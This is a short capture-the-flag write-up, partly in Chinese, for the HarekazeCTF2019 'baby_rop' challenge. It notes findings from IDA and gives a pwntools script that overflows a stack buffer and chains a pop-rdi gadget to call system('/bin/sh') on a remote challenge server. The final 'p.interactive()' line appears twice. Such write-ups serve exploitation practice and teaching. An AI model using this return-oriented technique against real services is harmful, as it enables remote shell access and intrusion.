[HarekazeCTF2019]baby_rop
ida
main函数
system地址
并且发现有/bin/sh
exp:
from pwn import *
p=remote('node3.buuoj.cn',29598)
binsh_addr = 0x0000000000601048
sys_addr = 0x0000000000400490
pop_rdi = 0x400683
payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(binsh_addr) + p64(sys_addr)
p.sendline(payload)
p.interactive()
p.interactive()